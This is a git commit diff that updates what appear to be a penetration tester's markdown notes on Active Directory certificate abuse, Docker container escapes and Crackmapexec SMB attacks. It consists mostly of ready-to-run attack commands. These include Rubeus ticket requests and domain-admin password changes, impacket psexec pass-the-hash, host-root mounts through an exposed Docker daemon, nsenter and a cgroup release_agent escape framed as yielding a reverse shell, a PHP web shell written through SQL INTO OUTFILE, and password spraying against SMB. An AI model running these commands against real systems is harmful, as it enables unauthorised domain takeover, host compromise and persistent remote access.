AD certificate and docker escapes
This commit is contained in:
parent
74845509af
commit
bbef002f0a
|
@ -29,6 +29,14 @@ Exploitable templates should have the following traits:
|
||||||
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
|
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
|
||||||
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
|
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
|
||||||
|
|
||||||
|
#### Certify
|
||||||
|
|
||||||
|
Find information about all registered CAs. For a start take a look at least at
|
||||||
|
```sh
|
||||||
|
Certify.exe find /vulnerable
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Certificate Creation
|
### Certificate Creation
|
||||||
|
|
||||||
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
|
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
|
||||||
|
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
|
||||||
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
|
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
|
||||||
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
|
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
|
||||||
|
|
||||||
* An alternative is certipy-ad
|
An alternative is certipy-ad
|
||||||
|
|
||||||
|
#### Certipy-AD
|
||||||
|
|
||||||
|
First `pip install certipy-ad`
|
||||||
|
Take a look at the Documentation provided in the [git repositories'
|
||||||
|
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
|
||||||
|
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
|
||||||
|
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
|
||||||
|
|
||||||
### Impersonation
|
### Impersonation
|
||||||
|
|
||||||
* Request TGT with the created cert
|
Request TGT with the created cert.
|
||||||
* Grab TGT
|
|
||||||
|
|
||||||
* On the machine via
|
#### On the target machine via
|
||||||
```sh
|
```sh
|
||||||
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
|
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
|
||||||
```
|
```
|
||||||
* Select a domain admin via opening `Active Directory Users and Computers`
|
Select a domain admin via opening `Active Directory Users and Computers`
|
||||||
```sh
|
```sh
|
||||||
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
|
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
|
||||||
```
|
```
|
||||||
|
@ -61,6 +76,13 @@ exit
|
||||||
dir \\<domain>\<dir>$\
|
dir \\<domain>\<dir>$\
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### On the attacking machine
|
||||||
|
|
||||||
|
Use impacket's psexec
|
||||||
|
```sh
|
||||||
|
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
|
||||||
|
```
|
||||||
|
|
||||||
## CVE-2022-26923
|
## CVE-2022-26923
|
||||||
|
|
||||||
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
|
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
|
||||||
|
|
|
@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
|
||||||
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
|
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Reversing Docker Images
|
## Remote Docker Daemon
|
||||||
|
|
||||||
* [Dive](https://github.com/wagoodman/dive)
|
Users inside the `docker` group may open tcp socket through docker
|
||||||
|
In case you find an exposed docker daemon it can be used in the following way
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
dive <IMAGE-ID>
|
docker -H tcp://$TARGET_IP:2375 ps
|
||||||
|
docker -H tcp://$TARGET_IP:2375 images
|
||||||
|
docker -H tcp://test.com:2375 exec <container> <cmd>
|
||||||
|
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
|
||||||
```
|
```
|
||||||
|
|
||||||
## Uploading Images to Registry
|
|
||||||
|
|
||||||
* Ever image has a `latest` tag
|
|
||||||
* Upload modified docker image as `latest`
|
|
||||||
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
|
|
||||||
|
|
||||||
## RCE via Exposed Docker Daemon
|
## RCE via Exposed Docker Daemon
|
||||||
|
|
||||||
* Users inside the `docker` group may open tcp socket through docker
|
Execute commands on socket
|
||||||
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
|
|
||||||
* Confirming via `curl http://test.com:2375/version` on open docker port
|
|
||||||
* Execute commands on socket
|
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
docker -H tcp://test.com:2375 ps
|
|
||||||
docker -H tcp://test.com:2375 exec <container> <cmd>
|
|
||||||
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
|
|
||||||
```
|
```
|
||||||
|
|
||||||
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
|
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
|
||||||
|
|
||||||
## Escape Container via Exposed Docker Daemon
|
## Escape Container via Exposed Docker Daemon
|
||||||
|
|
||||||
* Looking for exposed docker sockets
|
Look out for exposed docker sockets
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
find / -name "*sock" 2>/dev/null
|
find / -name "*sock" 2>/dev/null
|
||||||
groups
|
groups
|
||||||
```
|
```
|
||||||
|
|
||||||
* Mount the host volume and chroot to it, need alpine image.
|
Mount the host volume and chroot to it. Ideally, use an image that is
|
||||||
|
installed already, e.g. alpine here.
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
docker images
|
docker images
|
||||||
|
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
|
||||||
|
|
||||||
## Shared Namespaces
|
## Shared Namespaces
|
||||||
|
|
||||||
* Namespaces
|
Requires root inside the container
|
||||||
* Cgroups
|
|
||||||
* OverlayFS
|
|
||||||
|
|
||||||
* Requires root inside the container
|
|
||||||
|
|
||||||
* Execute command
|
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
nsenter --target 1 --mount sh
|
nsenter --target 1 --mount sh
|
||||||
|
nsenter --target 1 --mount --uts --ipc --net /bin/bash
|
||||||
```
|
```
|
||||||
|
|
||||||
## Misconfiguration
|
## Misconfiguration
|
||||||
|
|
||||||
### capabilities
|
### Capabilities
|
||||||
|
|
||||||
* Privileged container connect to the host directly, not through the docker engine
|
Privileged container connect to the host directly, not through the docker engine.
|
||||||
* Execution of bins on the host from libs inside the container is possible
|
Execution of binaries on the host from inside the container is possible.
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
capsh --print
|
capsh --print
|
||||||
```
|
```
|
||||||
|
|
||||||
* `man capabilities`
|
|
||||||
|
|
||||||
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
|
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
|
||||||
|
|
||||||
* Exploit and get a reverse shell to the host via
|
Exploit and get a reverse shell to the host via
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||||
|
@ -147,7 +134,7 @@ chmod a+x /exploit
|
||||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
```
|
```
|
||||||
|
|
||||||
* The file may appear outside the container on the host system
|
Caveat: The file may appear outside the container on some host systems. Have to investigate...
|
||||||
|
|
||||||
### cap_admin
|
### cap_admin
|
||||||
|
|
||||||
|
@ -169,8 +156,8 @@ the docker volume, e.g.
|
||||||
|
|
||||||
## Check fdisk
|
## Check fdisk
|
||||||
|
|
||||||
* `fdisk -l` and `lsblk`, host bulk device may be exposed
|
`fdisk -l` and `lsblk`, host bulk device may be exposed
|
||||||
* Mount the device
|
Mount the device
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
mkdir /mnt/hostdev
|
mkdir /mnt/hostdev
|
||||||
|
@ -218,6 +205,20 @@ Connection: Upgrade
|
||||||
Upgrade: tcp
|
Upgrade: tcp
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Reversing Docker Images
|
||||||
|
|
||||||
|
* [Dive](https://github.com/wagoodman/dive)
|
||||||
|
|
||||||
|
```sh
|
||||||
|
dive <IMAGE-ID>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Uploading Images to Registry
|
||||||
|
|
||||||
|
* Ever image has a `latest` tag
|
||||||
|
* Upload modified docker image as `latest`
|
||||||
|
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
|
||||||
|
|
||||||
## Escape through DB
|
## Escape through DB
|
||||||
|
|
||||||
* Login into DB
|
* Login into DB
|
||||||
|
@ -226,14 +227,14 @@ Upgrade: tcp
|
||||||
* Select table content into a file the user can read
|
* Select table content into a file the user can read
|
||||||
* Execute the file
|
* Execute the file
|
||||||
|
|
||||||
```sql
|
```SQL
|
||||||
create table h4x0r (pwn varchar(1024));
|
create table h4x0r (pwn varchar(1024));
|
||||||
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
|
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
|
||||||
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
|
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
|
||||||
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
|
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
|
||||||
```
|
```
|
||||||
|
|
||||||
* curl the webshell hon the exploited host
|
curl the webshell hon the exploited host
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
curl <host-IP>/shell.php?cmd=id
|
curl <host-IP>/shell.php?cmd=id
|
||||||
|
|
|
@ -1,23 +1,39 @@
|
||||||
# Crackmapexec
|
# Crackmapexec
|
||||||
|
|
||||||
* Dictionary attack against SMB
|
## Dictionary attack against SMB
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
|
||||||
```
|
```
|
||||||
* Use the password with `impacket/examples/psexec.py` in the following way
|
|
||||||
|
## Brute Force attack against SMB
|
||||||
|
|
||||||
|
Brute force attack using an anonymous user
|
||||||
|
|
||||||
|
```sh
|
||||||
|
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
|
||||||
|
```
|
||||||
|
|
||||||
|
## Use Found Password
|
||||||
|
|
||||||
|
Use the password with `impacket/examples/psexec.py` in the following way
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
psexec.py domain.name/<user>:<password>@<target-IP>
|
psexec.py domain.name/<user>:<password>@<target-IP>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Shares
|
## Enumerate Shares
|
||||||
|
|
||||||
* Check user permissions on shares
|
Check user permissions on shares
|
||||||
``sh
|
|
||||||
|
```sh
|
||||||
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
|
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
|
||||||
```
|
```
|
||||||
|
|
||||||
## SMB
|
## SMB
|
||||||
* Check user hash on the network via smb
|
|
||||||
|
Check user hash on the network via smb
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
|
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in New Issue